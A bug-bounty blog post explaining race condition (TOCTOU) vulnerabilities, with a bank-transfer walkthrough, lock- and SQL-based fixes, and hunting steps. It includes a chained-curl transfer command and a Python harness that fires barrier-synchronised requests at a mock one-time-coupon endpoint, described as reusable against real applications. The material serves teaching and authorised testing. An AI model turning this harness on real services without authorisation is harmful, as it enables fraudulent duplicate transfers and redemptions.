Race conditions: bug bounties
Race condition vulnerabilities, in my opinion, are one of the most interesting web vulnerabilities. They arise from the simplest mistakes developers make, and these mistakes have proved costly.
In the past, hackers have used race conditions to steal money from online banks, cryptocurrency exchanges, e-commerce websites and more.
What are race conditions?
- Race conditions arise when operations that were designed to run as one uninterrupted sequence (typically a check followed by an update of the same data) get interleaved with other operations on that data, so the result depends on timing rather than on the program's logic.
- To understand these vulnerabilities, you first need to understand the concept of concurrency.
What is concurrency?
- In computer programming, concurrency is the ability to execute different parts of a program at the same time, or interleaved, without changing the outcome of the program.
- Concurrency comes in two common forms: multiprocessing and multithreading.
- Multiprocessing means using multiple processes, usually spread over multiple CPUs or cores, to perform tasks simultaneously.
- Multithreading means a single process performs several tasks using "threads". On a single core these threads do not actually run at the same time; they take turns using the CPU, and when one thread is idle (waiting on the network or a database, for example) another thread can use the unused computing resources. On a multi-core machine, threads genuinely run in parallel. Deciding which thread runs when is called scheduling.
- This scheduling is what makes race conditions possible: a thread can be paused between two steps it expected to run back to back, and another thread can change the shared data in between. A web server handling two requests at once is exactly this situation.
When does a race condition become a vulnerability?
- A race condition becomes a vulnerability when it affects a security control mechanism.
- Imagine two threads are each executing a transfer of money between bank accounts. The application has to perform three tasks to transfer the money correctly: first it checks that the originating account has enough money, then it adds the money to the destination account, and lastly it subtracts the amount from the originating account.
So, with $100 in account A, two threads each trying to transfer $100 from A to B should behave like this:
THREAD 1
1. Check account balance of A ($100, enough); 2. Add $100 to account B; 3. Deduct $100 from account A
THREAD 2
1. Check account balance of A ($0, less than $100) => transfer fails, insufficient funds.
However, the same process with a race condition vulnerability looks like this:
- [Thread 1] Check account A balance ($100, enough)
- [Thread 2] Check account A balance ($100, enough)
- [Thread 1] Add $100 to account B; [$100 in A, $100 in B]
- [Thread 2] Add $100 to account B; [$100 in A, $200 in B]
- [Thread 1] Deduct $100 from account A; [$0 in A, $200 in B]
- [Thread 2] Deduct $100 from account A; [-$100 in A, $200 in B] (or $0 in A if the application clamps the balance)
So, as you have noticed, instead of ending with $0 in A and $100 in B, we end with $200 in B: both threads passed the balance check before either of them deducted the money. This pattern is often called a time-of-check to time-of-use (TOCTOU) bug.
Although race condition vulnerabilities are mostly associated with financial websites, hackers can use them in other situations too, like rigging online voting campaigns.
How to prevent
The concept of synchronization is central to safe concurrency. It means ensuring that threads or processes do not read and modify a shared resource at the same time, since that is what leads to race conditions and data inconsistencies. One way to achieve synchronization is through resource locks, which block other threads from touching a resource until the thread holding the lock is finished with it; the important detail is that the lock must cover the check and the update together, not just the update. In a database-backed web application the same effect usually comes from the database itself: run the check and update inside one transaction with row locking (for example SELECT ... FOR UPDATE), or collapse them into a single conditional statement such as UPDATE accounts SET balance = balance - 100 WHERE id = 'A' AND balance >= 100 and treat "zero rows updated" as a failed transfer.
In addition to synchronization, it is also important to follow secure coding practices to prevent race conditions from becoming more severe security issues. The principle of least privilege is one such practice, which involves granting applications and processes only the privileges they need to complete their tasks. For example, if an application only needs to read a file, it should not be granted write or execute permissions. This reduces the risks of system compromise during an attack.
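The interleaving shown in the transfer walkthrough above, next to the lock-based fix from the prevention section, as an added example that is not part of the original post. The "bank" is a constructed in-memory dictionary; the Barrier in the vulnerable version forces every thread past the balance check before any of them debits, which is the exact scheduling the post describes, and the separate UPDATE_LOCK stands in for a database applying each individual UPDATE atomically (which does not help, because the check is still outside it):

```python
import threading

# Constructed in-memory "bank": balances keyed by account id.
ACCOUNTS = {"A": 100, "B": 0}

# Stands in for the database applying one UPDATE statement atomically.
# Each step is atomic on its own; the bug is that check and update are separate steps.
UPDATE_LOCK = threading.Lock()


def adjust(acct, delta):
    with UPDATE_LOCK:
        ACCOUNTS[acct] += delta


def vulnerable_transfer(src, dst, amount, go):
    """Check-then-act with nothing holding the two steps together.
    `go` is a Barrier so every thread finishes the check before any debit happens."""
    if ACCOUNTS[src] < amount:       # 1. check balance
        return False
    go.wait()                        # the scheduler switches threads here
    adjust(dst, +amount)             # 2. credit destination
    adjust(src, -amount)             # 3. debit source
    return True


TRANSFER_LOCK = threading.Lock()


def safe_transfer(src, dst, amount):
    """Same three steps, but the check and both updates happen under one lock,
    so a second transfer can only observe the balance before or after the whole thing."""
    with TRANSFER_LOCK:
        if ACCOUNTS[src] < amount:
            return False
        adjust(dst, +amount)
        adjust(src, -amount)
        return True


def run(transfer, n, **kwargs):
    """Reset the bank, run `transfer` of $100 A->B from n threads at once,
    and return (number of transfers that succeeded, final balances)."""
    ACCOUNTS.update({"A": 100, "B": 0})
    results = [None] * n

    def worker(i):
        results[i] = transfer("A", "B", 100, **kwargs)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), dict(ACCOUNTS)


if __name__ == "__main__":
    print("vulnerable:", run(vulnerable_transfer, 2, go=threading.Barrier(2)))  # (2, {'A': -100, 'B': 200})
    print("safe:      ", run(safe_transfer, 2))                                  # (1, {'A': 0, 'B': 100})
```

The Barrier is only there to make the bad interleaving reproducible; in production the same window exists, it is just a few microseconds wide, which is why exploitation means firing many requests and hoping one pair lands inside it.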
How to hunt?
1. Find features prone to race conditions:
- Race conditions often occur in features that involve updating numerical values, such as online voting, gaming scores, bank transfers, e-commerce payments, and gift card balances. To identify these features in an application, you can look for requests that are involved in updating these numbers. For example, if you want to test the request used to transfer money from a banking site, you can copy the request using Burp Suite by right-clicking it and selecting “Copy as curl command.”
2. Send simultaneous requests
- To test for and potentially exploit race conditions in a target, you send multiple copies of the same request to the server at the same time. For instance, to check whether it is possible to transfer more money than you have in your bank account, you can send several transfer requests simultaneously with curl. One way to do this is to copy the command from Burp, paste it into the terminal and join the copies with an "&", which runs each command in the background on a Linux system so the next one starts immediately:
curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000) & curl (transfer $3000) & wait
- Keep in mind that "&" only starts the processes at roughly the same time; each curl still does its own DNS lookup and TCP/TLS handshake, so the requests arrive spread out over tens of milliseconds. Repeat the attempt several times, and if it does not win, use something that prepares every connection first and releases the requests together (a small script with a barrier, or Burp's Intruder/Turbo Intruder).
- Be sure to test operations that should be allowed only once, or only up to a limit. For example, if you have a bank account with a balance of $3000, trying to transfer $5000 is pointless, because no single request would be allowed. Trying to transfer $10 many times is also pointless, since you could do that even without a race condition. The interesting case is an amount that a single request may take but a second one should not.
3. Check the results
- This is a no-brainer: check whether your attack succeeded. Count how many of the responses reported success (you expect exactly one), then confirm the effect on the server side, for example that the balance went negative, the destination received more than it should have, or a one-time coupon was applied twice.
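The three hunting steps above, as one runnable harness (added here; not the original post's code). It prepares one TCP connection per request and only then releases every send from a threading.Barrier, which is the tighter timing the "&" trick approximates, and it tallies the responses so the "check the results" step is a number rather than a guess. Because it has to run offline, it also starts a constructed vulnerable target on localhost: a coupon that may be redeemed once, implemented as check-then-set with a short delay that stands in for the real app's database round trip. The /redeem path, the coupon code and the 409 response are assumptions of this example.

```python
import http.client
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed target state: a coupon that is supposed to be redeemable exactly once.
COUPON = {"redeemed": False, "redemptions": 0}


class VulnerableCouponHandler(BaseHTTPRequestHandler):
    """Check-then-set with a window in between (assumed endpoint, for the demo only)."""

    def do_POST(self):
        if self.path != "/redeem":
            self.send_error(404)
            return
        if COUPON["redeemed"]:                 # check
            self._reply(409, b"already redeemed")
            return
        time.sleep(0.2)                        # stands in for a DB/API round trip
        COUPON["redeemed"] = True              # act
        COUPON["redemptions"] += 1
        self._reply(200, b"redeemed")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):              # keep the demo quiet
        pass


def start_target():
    server = ThreadingHTTPServer(("127.0.0.1", 0), VulnerableCouponHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def race(host, port, path, n, body=b"", headers=None):
    """Step 2: open n connections, then release all n requests at the same instant.
    Returns a list of (status, body) so step 3 can be done by counting."""
    headers = headers or {"Content-Type": "application/x-www-form-urlencoded"}
    barrier = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.connect()                         # handshake finished before the barrier
        barrier.wait()                         # every thread sends from here together
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        results[i] = (resp.status, resp.read().decode())
        conn.close()

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def run_demo(n=10):
    """Run the attack against the local target and return
    (per-request results, number of 200s, how often the coupon was really redeemed)."""
    server = start_target()
    port = server.server_address[1]
    results = race("127.0.0.1", port, "/redeem", n, body=b"code=WELCOME10")
    server.shutdown()
    successes = sum(1 for status, _ in results if status == 200)
    return results, successes, COUPON["redemptions"]


if __name__ == "__main__":
    results, successes, redemptions = run_demo()
    print(f"{successes} of {len(results)} requests returned 200; "
          f"the one-time coupon was redeemed {redemptions} times")
```

Any count above one is the finding. The race is timing-dependent even against this deliberately slow target, so treat a single clean run as inconclusive and repeat it; against a real application you would swap the host, port, path, body and session headers for the ones copied from Burp and leave the harness unchanged.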
Escalating the vulnerability
It is important to consider the potential impact of a race condition on the affected functionality when evaluating the severity of the vulnerability. A race condition that allows an attacker to gain unlimited access to financial resources, such as through cash withdrawal or fund transfer, could be highly detrimental to both the affected individuals and the organization.
In addition to financial gain, an attacker may be able to use a race condition to gain social influence or access to sensitive information. For example, a race condition that allows an attacker to gain unauthorized access to a social media account could potentially be used to spread misinformation or manipulate public opinion.
When reporting on the impact of a race condition, it is important to clearly articulate the potential consequences for the affected individuals and the organization. This may include the potential financial loss, loss of sensitive information, or damage to the organization’s reputation. Providing clear and detailed information about the potential impact of the vulnerability can help prioritize its resolution and mitigate the potential consequences.
I hope this blog post has helped! Happy hunting and merry Christmas!